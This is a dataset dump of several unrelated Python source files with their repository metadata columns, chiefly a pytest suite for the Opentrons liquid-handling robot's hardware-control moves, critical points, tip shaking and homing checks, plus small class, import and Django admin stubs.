| 22.857143 | 72 | 0.75 | 19 | 160 | 5.947368 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014388 | 0.13125 | 160 | 6 | 73 | 26.666667 | 0.798561 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
6ffb015dc6dcff1447dfa9f9030835ec04278c00 | 330 | py | Python | src/activesoup/response.py | n2ygk/activesoup | a66c4ba174e5d40bb343de5bffc49356615a1566 | [
"MIT"
] | null | null | null | src/activesoup/response.py | n2ygk/activesoup | a66c4ba174e5d40bb343de5bffc49356615a1566 | [
"MIT"
] | null | null | null | src/activesoup/response.py | n2ygk/activesoup | a66c4ba174e5d40bb343de5bffc49356615a1566 | [
"MIT"
] | null | null | null | class Response:
def __init__(self, raw_response):
self._raw_response = raw_response
@property
def url(self):
return self._raw_response.url
@property
def status_code(self):
return self._raw_response.status_code
@property
def response(self):
return self._raw_response
| 19.411765 | 45 | 0.663636 | 40 | 330 | 5.075 | 0.275 | 0.325123 | 0.369458 | 0.251232 | 0.369458 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263636 | 330 | 16 | 46 | 20.625 | 0.835391 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.25 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
82efb027bc78c19f4b0dff30aeae82569cdcb9c4 | 71 | py | Python | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/imports/test_import_package_6/random_module/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/imports/test_import_package_6/random_module/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | 5 | 2021-04-08T22:02:15.000Z | 2022-02-10T14:53:45.000Z | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/imports/test_import_package_6/random_module/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null | from in1.in2 import main2
from in1 import file
print(main2.x + file.y)
| 17.75 | 25 | 0.760563 | 14 | 71 | 3.857143 | 0.642857 | 0.259259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0.15493 | 71 | 3 | 26 | 23.666667 | 0.816667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
82f6ec65f993a55f6c7b326e17d953d15618b5c2 | 206 | py | Python | packages/auto-nlp-deployment/src/deployments/runtimes/docker/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 4 | 2021-10-05T17:34:02.000Z | 2022-03-23T07:33:19.000Z | packages/auto-nlp-deployment/src/deployments/runtimes/docker/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 11 | 2022-03-01T14:37:52.000Z | 2022-03-31T05:11:23.000Z | packages/auto-nlp-deployment/src/deployments/runtimes/docker/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 1 | 2022-01-29T13:32:22.000Z | 2022-01-29T13:32:22.000Z | from .docker_deployment_runtime import DeploymentRuntime # type: ignore
from .docker_deployment_task import DockerDeploymentTask
from .docker_deployment_runtime_config import DockerDeploymentRuntimeConfig
| 51.5 | 75 | 0.898058 | 21 | 206 | 8.47619 | 0.571429 | 0.168539 | 0.337079 | 0.303371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07767 | 206 | 3 | 76 | 68.666667 | 0.936842 | 0.058252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d2416decf7026081e2e48f6824318ad8880c6618 | 221 | py | Python | ASTNode/__init__.py | peterzheng98/C2Mx | 4c1d8bb69da0bbb88254e60ae48f1cbc00c609c6 | [
"MIT"
] | null | null | null | ASTNode/__init__.py | peterzheng98/C2Mx | 4c1d8bb69da0bbb88254e60ae48f1cbc00c609c6 | [
"MIT"
] | null | null | null | ASTNode/__init__.py | peterzheng98/C2Mx | 4c1d8bb69da0bbb88254e60ae48f1cbc00c609c6 | [
"MIT"
] | null | null | null | from .AbstractASTNode import AbstractASTNode
from .FuncDecl import *
from .CompondStmt import *
from .AbstractType import *
from .VarDecl import *
from .CallExpr import *
from .Literals import *
from .Arithmetic import *
| 24.555556 | 44 | 0.78733 | 25 | 221 | 6.96 | 0.4 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144796 | 221 | 8 | 45 | 27.625 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d26b32f3bfef91f96999577e14286dd2ba7d78d7 | 171 | py | Python | students/K33401/Nikitin_Michail/lab2/lab2/tours/admin.py | mexannik1998/ITMO_ICT_WebDevelopment_2020-2021 | b35f80e8439784e1ab24fbe7db82f30864ba9b69 | [
"MIT"
] | null | null | null | students/K33401/Nikitin_Michail/lab2/lab2/tours/admin.py | mexannik1998/ITMO_ICT_WebDevelopment_2020-2021 | b35f80e8439784e1ab24fbe7db82f30864ba9b69 | [
"MIT"
] | null | null | null | students/K33401/Nikitin_Michail/lab2/lab2/tours/admin.py | mexannik1998/ITMO_ICT_WebDevelopment_2020-2021 | b35f80e8439784e1ab24fbe7db82f30864ba9b69 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
admin.site.register(User)
admin.site.register(Tour)
admin.site.register(UsersComments)
admin.site.register(Booked) | 21.375 | 34 | 0.812865 | 24 | 171 | 5.791667 | 0.5 | 0.258993 | 0.489209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076023 | 171 | 8 | 35 | 21.375 | 0.879747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
9637183dca6dd336674fa8ad9ed134beb70af9ca | 123 | py | Python | d6tpipe/exceptions.py | Pandinosaurus/d6tpipe | 4ec6c755504f5fe6d5b71e8621375315ce41ad6f | [
"MIT"
] | 184 | 2018-12-28T13:31:52.000Z | 2022-01-27T19:10:24.000Z | d6tpipe/exceptions.py | Pandinosaurus/d6tpipe | 4ec6c755504f5fe6d5b71e8621375315ce41ad6f | [
"MIT"
] | 2 | 2019-04-18T02:59:45.000Z | 2022-01-20T04:15:58.000Z | d6tpipe/exceptions.py | Pandinosaurus/d6tpipe | 4ec6c755504f5fe6d5b71e8621375315ce41ad6f | [
"MIT"
] | 8 | 2019-04-15T01:41:45.000Z | 2020-06-03T17:49:35.000Z | class PullError(Exception):
pass
class PushError(Exception):
pass
class ResourceExistsError(Exception):
pass
| 13.666667 | 37 | 0.739837 | 12 | 123 | 7.583333 | 0.5 | 0.428571 | 0.395604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186992 | 123 | 8 | 38 | 15.375 | 0.91 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
964ac4f40568300729d610f35b77ec77806165a7 | 101 | py | Python | ViyaCasual/CAS/CASLibraryBase.py | willhaley-bne/ViyaCasual | 9c0ca9b05a9602e67c8d56e2f63eba01e1218e42 | [
"MIT"
] | null | null | null | ViyaCasual/CAS/CASLibraryBase.py | willhaley-bne/ViyaCasual | 9c0ca9b05a9602e67c8d56e2f63eba01e1218e42 | [
"MIT"
] | null | null | null | ViyaCasual/CAS/CASLibraryBase.py | willhaley-bne/ViyaCasual | 9c0ca9b05a9602e67c8d56e2f63eba01e1218e42 | [
"MIT"
] | null | null | null |
class CASLibraryBase(object):
def __init__(self, viya_conn):
self.viya_conn = viya_conn | 20.2 | 34 | 0.70297 | 13 | 101 | 4.923077 | 0.615385 | 0.375 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207921 | 101 | 5 | 35 | 20.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
965ce63760eb0c5a23bd0d17fc15fafb1e7506e8 | 34 | py | Python | layers/modules/__init__.py | xinqi-fan/SL-FMDet | 8e938cefecc758c04f679bbf157773044d4be103 | [
"MIT"
] | 2 | 2022-01-05T10:17:31.000Z | 2022-01-05T10:17:36.000Z | layers/modules/__init__.py | xinqi-fan/Face_Mask_Detection | 8e938cefecc758c04f679bbf157773044d4be103 | [
"MIT"
] | 1 | 2022-03-23T09:41:34.000Z | 2022-03-23T09:41:34.000Z | layers/modules/__init__.py | xinqi-fan/SL-FMDet | 8e938cefecc758c04f679bbf157773044d4be103 | [
"MIT"
] | null | null | null | from .multibox_loss_mask import *
| 17 | 33 | 0.823529 | 5 | 34 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9673d0140036a0a911f3a7862c4b74295b5a90e0 | 17,990 | py | Python | api/tests/opentrons/hardware_control/test_moves.py | mrod0101/opentrons | 6450edb0421f1c2484c292f8583602d8f6fd13b8 | [
"Apache-2.0"
] | null | null | null | api/tests/opentrons/hardware_control/test_moves.py | mrod0101/opentrons | 6450edb0421f1c2484c292f8583602d8f6fd13b8 | [
"Apache-2.0"
] | 2 | 2022-02-15T03:28:35.000Z | 2022-02-28T01:34:18.000Z | api/tests/opentrons/hardware_control/test_moves.py | mrod0101/opentrons | 6450edb0421f1c2484c292f8583602d8f6fd13b8 | [
"Apache-2.0"
] | null | null | null | import mock
import pytest
from opentrons import types
from opentrons import hardware_control as hc
from opentrons.calibration_storage.types import (
DeckCalibration,
SourceType,
CalibrationStatus,
)
from opentrons.hardware_control.types import (
Axis,
CriticalPoint,
OutOfBoundsMove,
MotionChecks,
MustHomeError,
)
from opentrons.hardware_control.robot_calibration import RobotCalibration
async def test_controller_must_home(hardware_api):
abs_position = types.Point(30, 20, 10)
mount = types.Mount.RIGHT
home = mock.AsyncMock()
hardware_api.home = home
await hardware_api.move_to(mount, abs_position)
home.assert_called_once()
async def test_home_specific_sim(hardware_api):
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 10, 20))
# Avoid the autoretract when moving two difference instruments
hardware_api._last_moved_mount = None
await hardware_api.move_rel(types.Mount.LEFT, types.Point(0, 0, -20))
await hardware_api.home([Axis.Z, Axis.C])
assert hardware_api._current_position == {
Axis.X: 0,
Axis.Y: 10,
Axis.Z: 218,
Axis.A: -10,
Axis.B: 19,
Axis.C: 19,
}
async def test_retract(hardware_api):
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 10, 20))
await hardware_api.retract(types.Mount.RIGHT, 10)
assert hardware_api._current_position == {
Axis.X: 0,
Axis.Y: 10,
Axis.Z: 218,
Axis.A: 218,
Axis.B: 19,
Axis.C: 19,
}
async def test_move(hardware_api):
abs_position = types.Point(30, 20, 10)
mount = types.Mount.RIGHT
target_position1 = {
Axis.X: 30,
Axis.Y: 20,
Axis.Z: 218,
Axis.A: -20,
Axis.B: 19,
Axis.C: 19,
}
await hardware_api.home()
await hardware_api.move_to(mount, abs_position)
assert hardware_api._current_position == target_position1
# This assert implicitly checks that the mount offset is not applied to
# relative moves; if you change this to move_to, the offset will be
# applied again
rel_position = types.Point(30, 20, -10)
mount2 = types.Mount.LEFT
target_position2 = {
Axis.X: 60,
Axis.Y: 40,
Axis.Z: 208,
Axis.A: 218, # The other instrument is retracted
Axis.B: 19,
Axis.C: 19,
}
await hardware_api.move_rel(mount2, rel_position)
assert hardware_api._current_position == target_position2
async def test_move_extras_passed_through(hardware_api, monkeypatch):
mock_be_move = mock.AsyncMock()
monkeypatch.setattr(hardware_api._backend, "move", mock_be_move)
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
assert mock_be_move.call_args_list[0][1]["speed"] is None
assert mock_be_move.call_args_list[0][1]["axis_max_speeds"] == {}
mock_be_move.reset_mock()
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(1, 1, 1), speed=30, max_speeds={Axis.X: 10}
)
assert mock_be_move.call_args_list[0][1]["speed"] == 30
assert mock_be_move.call_args_list[0][1]["axis_max_speeds"] == {"X": 10}
mock_be_move.reset_mock()
await hardware_api.move_rel(
types.Mount.LEFT, types.Point(1, 1, 1), speed=40, max_speeds={Axis.Y: 20}
)
assert mock_be_move.call_args_list[0][1]["speed"] == 40
assert mock_be_move.call_args_list[0][1]["axis_max_speeds"] == {"Y": 20}
async def test_mount_offset_applied(hardware_api, is_robot):
await hardware_api.home()
abs_position = types.Point(30, 20, 10)
mount = types.Mount.LEFT
target_position = {
Axis.X: 64,
Axis.Y: 20,
Axis.Z: -20,
Axis.A: 218,
Axis.B: 19,
Axis.C: 19,
}
await hardware_api.move_to(mount, abs_position)
assert hardware_api._current_position == target_position
async def test_critical_point_applied(hardware_api, monkeypatch, is_robot):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p10_single_v1", "id": "testyness"},
}
await hardware_api.cache_instruments()
# Our critical point is now the tip of the nozzle
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset = {
Axis.X: 0,
Axis.Y: 0,
Axis.Z: 218,
Axis.A: -12, # from pipette-config.json nozzle offset
Axis.B: 19,
Axis.C: 19,
}
assert hardware_api._current_position == target_no_offset
target = {Axis.X: 0, Axis.Y: 0, Axis.A: 0, Axis.C: 19}
assert await hardware_api.current_position(types.Mount.RIGHT) == target
p10_tip_length = 33
# Specifiying critical point overrides as mount should not use nozzle
# offset
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.MOUNT
)
assert hardware_api._current_position == {
Axis.X: 0.0,
Axis.Y: 0.0,
Axis.Z: 218,
Axis.A: -30,
Axis.B: 19,
Axis.C: 19,
}
assert await hardware_api.current_position(
types.Mount.RIGHT, critical_point=CriticalPoint.MOUNT
) == {Axis.X: 0.0, Axis.Y: 0.0, Axis.A: 0, Axis.C: 19}
# Specifying the critical point as nozzle should have the same behavior
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.NOZZLE
)
assert hardware_api._current_position == target_no_offset
await hardware_api.pick_up_tip(types.Mount.RIGHT, p10_tip_length)
# Now the current position (with offset applied) should change
# pos_after_pickup + model_offset + critical point
target[Axis.A] = 218 + 12 + (-1 * p10_tip_length)
target_no_offset[Axis.C] = target[Axis.C] = 2
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# This move should take the new critical point into account
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset[Axis.A] = 21
assert hardware_api._current_position == target_no_offset
# But the position with offset should be back to the original
target[Axis.A] = 0
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# And removing the tip should move us back to the original
await hardware_api.move_rel(types.Mount.RIGHT, types.Point(2.5, 0, 0))
await hardware_api.drop_tip(types.Mount.RIGHT)
await hardware_api.home_plunger(types.Mount.RIGHT)
target[Axis.A] = 33 + hc.DROP_TIP_RELEASE_DISTANCE
target_no_offset[Axis.X] = 2.5
target[Axis.X] = 2.5
assert await hardware_api.current_position(types.Mount.RIGHT) == target
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target[Axis.X] = 0
target_no_offset[Axis.X] = 0
target_no_offset[Axis.A] = -12
target[Axis.A] = 0
assert hardware_api._current_position == target_no_offset
assert await hardware_api.current_position(types.Mount.RIGHT) == target
async def test_new_critical_point_applied(hardware_api):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p10_single_v1", "id": "testyness"},
}
await hardware_api.cache_instruments()
# Our critical point is now the tip of the nozzle
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset = {
Axis.X: 0,
Axis.Y: 0,
Axis.Z: 218,
Axis.A: -12, # from pipette-config.json model offset
Axis.B: 19,
Axis.C: 19,
}
assert hardware_api._current_position == target_no_offset
target = {Axis.X: 0, Axis.Y: 0, Axis.A: 0, Axis.C: 19}
assert await hardware_api.current_position(types.Mount.RIGHT) == target
p10_tip_length = 33
# Specifiying critical point overrides as mount should not use model offset
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.MOUNT
)
assert hardware_api._current_position == {
Axis.X: 0.0,
Axis.Y: 0.0,
Axis.Z: 218,
Axis.A: -30,
Axis.B: 19,
Axis.C: 19,
}
assert await hardware_api.current_position(
types.Mount.RIGHT, critical_point=CriticalPoint.MOUNT
) == {Axis.X: 0.0, Axis.Y: 0.0, Axis.A: 0, Axis.C: 19}
# Specifying the critical point as nozzle should have the same behavior
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.NOZZLE
)
assert hardware_api._current_position == target_no_offset
await hardware_api.pick_up_tip(types.Mount.RIGHT, p10_tip_length)
# Now the current position (with offset applied) should change
# pos_after_pickup + model_offset + critical point
target[Axis.A] = 218 + (12) + (-1 * p10_tip_length)
target_no_offset[Axis.C] = target[Axis.C] = 2
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# This move should take the new critical point into account
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset[Axis.A] = 21
assert hardware_api._current_position == target_no_offset
# But the position with offset should be back to the original
target[Axis.A] = 0
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# And removing the tip should move us back to the original
await hardware_api.move_rel(types.Mount.RIGHT, types.Point(2.5, 0, 0))
await hardware_api.drop_tip(types.Mount.RIGHT)
await hardware_api.home_plunger(types.Mount.RIGHT)
target[Axis.A] = 33 + hc.DROP_TIP_RELEASE_DISTANCE
target_no_offset[Axis.X] = 2.5
target[Axis.X] = 2.5
assert await hardware_api.current_position(types.Mount.RIGHT) == target
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target[Axis.X] = 0
target_no_offset[Axis.X] = 0
target_no_offset[Axis.A] = -12
target[Axis.A] = 0
assert hardware_api._current_position == target_no_offset
assert await hardware_api.current_position(types.Mount.RIGHT) == target
async def test_attitude_deck_cal_applied(monkeypatch, loop):
new_gantry_cal = [[1.0047, -0.0046, 0.0], [0.0011, 1.0038, 0.0], [0.0, 0.0, 1.0]]
called_with = None
async def mock_move(
position, speed=None, home_flagged_axes=True, axis_max_speeds=None
):
nonlocal called_with
called_with = position
hardware_api = await hc.API.build_hardware_simulator(loop=loop)
monkeypatch.setattr(hardware_api._backend, "move", mock_move)
deck_cal = RobotCalibration(
deck_calibration=DeckCalibration(
attitude=new_gantry_cal, source=SourceType.user, status=CalibrationStatus()
)
)
hardware_api.set_robot_calibration(deck_cal)
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
assert called_with["X"] == 0.0
assert called_with["Y"] == 0.0
assert called_with["A"] == -30.0
# Check that mount offset is also applied
await hardware_api.move_to(types.Mount.LEFT, types.Point(0, 0, 0))
assert round(called_with["X"], 2) == 34.16
assert round(called_with["Y"], 2) == 0.04
assert round(called_with["Z"], 2) == -30.0
async def test_other_mount_retracted(hardware_api, is_robot):
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
assert await hardware_api.gantry_position(types.Mount.RIGHT) == types.Point(0, 0, 0)
await hardware_api.move_to(types.Mount.LEFT, types.Point(20, 20, 0))
assert await hardware_api.gantry_position(types.Mount.RIGHT) == types.Point(
54, 20, 248
)
async def test_shake_during_pick_up(hardware_api, monkeypatch):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p1000_single_v2.0", "id": "testyness"},
}
await hardware_api.cache_instruments()
shake_tips_pick_up = mock.Mock(side_effect=hardware_api._shake_off_tips_pick_up)
monkeypatch.setattr(hardware_api, "_shake_off_tips_pick_up", shake_tips_pick_up)
# Test double shake for after pick up tips
await hardware_api.pick_up_tip(types.Mount.RIGHT, 50)
shake_tip_calls = [mock.call(types.Mount.RIGHT), mock.call(types.Mount.RIGHT)]
shake_tips_pick_up.assert_has_calls(shake_tip_calls)
move_rel = mock.Mock(side_effect=hardware_api.move_rel)
monkeypatch.setattr(hardware_api, "move_rel", move_rel)
# Test shakes in X and Y direction with 0.3 mm shake tip distance
shake_tips_pick_up.reset_mock()
await shake_tips_pick_up(types.Mount.RIGHT)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-0.3, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0.6, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-0.3, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, -0.3, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0.6, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, -0.3, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
async def test_shake_during_drop(hardware_api, monkeypatch):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p1000_single_v1.5", "id": "testyness"},
}
await hardware_api.cache_instruments()
await hardware_api.add_tip(types.Mount.RIGHT, 50.0)
hardware_api.set_current_tiprack_diameter(types.Mount.RIGHT, 30.0)
shake_tips_drop = mock.Mock(side_effect=hardware_api._shake_off_tips_drop)
monkeypatch.setattr(hardware_api, "_shake_off_tips_drop", shake_tips_drop)
# Test single shake after drop tip
await hardware_api.drop_tip(types.Mount.RIGHT)
shake_tips_drop.assert_called_once_with(types.Mount.RIGHT, 30)
move_rel = mock.Mock(side_effect=hardware_api.move_rel)
monkeypatch.setattr(hardware_api, "move_rel", move_rel)
# Test drop tip shake with 25% of tiprack well diameter
# between upper (2.25 mm) and lower limit (1.0 mm)
shake_tips_drop.reset_mock()
await shake_tips_drop(types.Mount.RIGHT, 2.0 * 4)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-2, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(4, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-2, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
# Test drop tip shake with 25% of tiprack well diameter
# over upper (2.25 mm) limit
shake_tips_drop.reset_mock()
await shake_tips_drop(types.Mount.RIGHT, 2.3 * 4)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-2.25, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(4.5, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-2.25, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
# Test drop tip shake with 25% of tiprack well diameter
# below lower (1.0 mm) limit
shake_tips_drop.reset_mock()
await shake_tips_drop(types.Mount.RIGHT, 0.9 * 4)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-1, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(2, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-1, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
async def test_move_rel_bounds(hardware_api):
with pytest.raises(OutOfBoundsMove):
await hardware_api.move_rel(
types.Mount.RIGHT, types.Point(0, 0, 2000), check_bounds=MotionChecks.HIGH
)
async def test_move_rel_homing_failures(hardware_api):
await hardware_api.home()
hardware_api._backend._smoothie_driver._homed_flags = {
"X": True,
"Y": True,
"Z": False,
"A": True,
"B": False,
"C": False,
}
# If one axis being used isn't homed, we must get an exception
with pytest.raises(MustHomeError):
await hardware_api.move_rel(
types.Mount.LEFT, types.Point(0, 0, 2000), fail_on_not_homed=True
)
# If an axis that _isn't_ being moved isn't homed, that's fine
await hardware_api.move_rel(
types.Mount.RIGHT, types.Point(0, 0, 2000), fail_on_not_homed=True
)
async def test_current_position_homing_failures(hardware_api):
await hardware_api.home()
hardware_api._backend._smoothie_driver._homed_flags = {
"X": True,
"Y": True,
"Z": False,
"A": True,
"B": False,
"C": True,
}
# If one axis being used isn't homed, we must get an exception
with pytest.raises(MustHomeError):
await hardware_api.current_position(
mount=types.Mount.LEFT,
fail_on_not_homed=True,
)
with pytest.raises(MustHomeError):
await hardware_api.gantry_position(
mount=types.Mount.LEFT,
fail_on_not_homed=True,
)
# If an axis that _isn't_ being moved isn't homed, that's fine
await hardware_api.current_position(
mount=types.Mount.RIGHT,
fail_on_not_homed=True,
)
await hardware_api.gantry_position(
mount=types.Mount.RIGHT,
fail_on_not_homed=True,
)
